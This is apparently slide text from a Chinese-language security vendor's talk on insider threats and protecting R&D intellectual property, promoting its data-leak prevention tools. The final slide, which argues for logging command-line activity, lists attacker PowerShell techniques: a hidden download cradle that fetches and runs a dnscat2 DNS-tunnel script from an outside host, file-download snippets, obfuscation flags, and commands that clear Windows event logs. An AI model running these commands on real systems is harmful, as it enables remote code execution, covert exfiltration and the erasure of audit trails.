正面迎戰內部威脅, 公司被害 ? 還是員工被駭? FineArt - Victor Chen
資安風險維持 Top 5 ,資料外洩 > 網路攻擊 The Global Risks Report 2019 14th Edition Top 5 Global Risks in Terms of Likelihood The Global Risks Landscape 2019 風險可能性 衝擊 http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf
情資收集者最感興趣的六大領域 Industry Priority Sectors/ Technologies Industry Priority Sectors/ Technologies • • Advanced pressurized Oil, gas, and coalbed • • Energy/ 3D Printing High-performance High-end water reactor and high- methane development, • Advanced robotics composite materials Alternative Manufacturing temperature, gas- including fracking • • Aircraft engines High-performance sealing ( 高端製造業 ) • Energy cooled nuclear power Smart grids • Aviation maintenance and materials • stations Solar energy technology • ( 能源 / 替代能源 ) service sectors Integrated circuit • • Biofuels Wind turbines • Civilian aircraft manufacturing equipment • Energy-efficient • Electric motors and assembly technology industries • • Foundational manufacturing Space infrastructure and equipment exploration technology • • Advanced medical Biopharmaceuticals Biotechnology • • High-end computer Synthetic rubber • devices Genetically modified ( 生物技術 ) numerically controlled • Biomanufacturing and organisms machines • chemical Infectious disease manufacturing treatment • • Biomaterials New vaccines and drugs • • Artificial intelligence Network equipment • • Aerospace & Marin system Information And Defense • • Big data analysis Next-generation broadband • aeronautic system Radar ( 國防科技 ) Communications • Core electronics industries wireless communications • • Armaments Optics • Technology E-commerce service networks • • Foundational software Quantum computing and ( 信息通信技術 ) • • Batteries Hybrid and electric cars Environmental products communications • • Energy-efficient Waste management • • High-end computer chips Rare-earth materials Protection • appliances Water/air pollution control • Internet of thing ( 環境保護 ) • Green building materials 2018 Foreign Economic Espionage in Cyberspace report https://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf
研發部門是企業命脈,卻最難管理
研發工程師工作環境 開發板 RJ-45 IDE Application JTag Source code DB SVN HDL Tools File R&D Simulator Test In-Circuit-Test CAX / EDA tool Layout Tools / PCB Servers (Data / DB) Machine
SVS+SVT 滿足研發開發工具之使用保護 System Call Print Image • • System & DLL Out Put File Pip Process (IPC) • • Download / Upload • Tunnel / Cloud Application Network API • Custom Protocol • CMD + • IDE Power Shell Script CMD & Shell • Run Executable(EXE) • Application Hardware Connect to Hardware Device • R&D Key Verification 3rd Party Application Screen / Video • Screen Capture Capture
SVS + SVT 滿足對研發智慧財產完整保護 R&D 專案開發電腦 可正常使用 SVN 、開發板 SVT Allowed Prohibited/ 可限制多種操 Controlled 作行為 列印、 PrtScr 、 IPC Controlled 可限制貼出字數 CTRL-C + CTRL-V
Demo 1 Visual Studio 寫出保護,系統防守 Visual Studio 寫出儲存時,即受到保護 Visual Studio 政策防守: Prohibited Call System 可以依據各產業別特殊工具進行防守與管控,確保智慧資產不會外洩。
指令環境下的風險,資安與稽核知多少 ?
IT 資安與稽核應了解研發單位的應用 System Call Print Image • • System & DLL Out Put File Pip Process (IPC) • • Download / Upload • Tunnel / Cloud Application Network API • Custom Protocol • CMD + • IDE Power Shell Script CMD & Shell • Run Executable(EXE) • Application Hardware Connect to Hardware Device • R&D Key Verification 3rd Party Application Screen / Video • Screen Capture Capture
CMD 與 PowerShell 環境分析 Cmd.exe • 網路行為記錄 Windows PowerShell • OS default PowerShell ISE • SDK Command Function & AP cmd 軌跡記錄 { } Call cmd.exe • Call PowerShell • 程序記錄 IDE Call Call exe • Command ConEmu Console2 軟體安控 • • PSReadLine Powershell ise • • PSGet Powershell • • Chocolatey Dell powerGUI • • SVS 安全碟 Babun (optional) Sapien Powershell studio • • Cmder AWS tools for Powershell • • 3 rd Party Git Bash by MinGW & MinTTY Adam driscoll's powershell • • Application WSL ubuntu on windows Powershell web access, • • SVT 加密通道 Cygwin Master-powershell • • Xshell Vmware vsphere powerCLI • •
從小處可以一窺指令軌跡記錄的重要性 PowerShell Dodge 3 ways to download files with PowerShell Code Obfuscator – WindowStyle hidden / -w $url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt" Crunchcode (VBA) hidden $output = "$PSScriptRoot\real.ps1" ScriptCryptor (VBA, JavaScript) – Exec Bypass Invoke-WebRequest $start_time = Get-Date CodeProtection (VBA) – Command / -c $readteam = New-Object System.Net.WebClient Vbad (VBA) – EncodedCommand / -e / -Enc $ readteam.DownloadFile($url, $output) Stunnix (C++, Perl, JavaScript, VBScript ) – Nop / -Noprofile Scripts Encryptor −(New -object System.net.webclient).DownlodFile() (HTML,JavaScript/JScript, C/C++/MFC) System.Net.WebClient −(New -object System.net.Webclient).DownloadString() ISESteroids (PowerShell) Start-BitsTransfer -Source $url -Destination $output - Start-BitsTransfer Asynchronous Write-Output "Time taken: $((Get- Date).Subtract($start_time).Seconds) second(s)" dnscat2.ps1 DNS Tunnel with powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/ dnscat2- powershell/master/dnscat2.ps1 ’); PowerShell Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus} Clear-EventLog -LogName System Clean all event-log Clear-EventLog -LogName Security Clear-EventLog -LogName Application
Recommend
More recommend
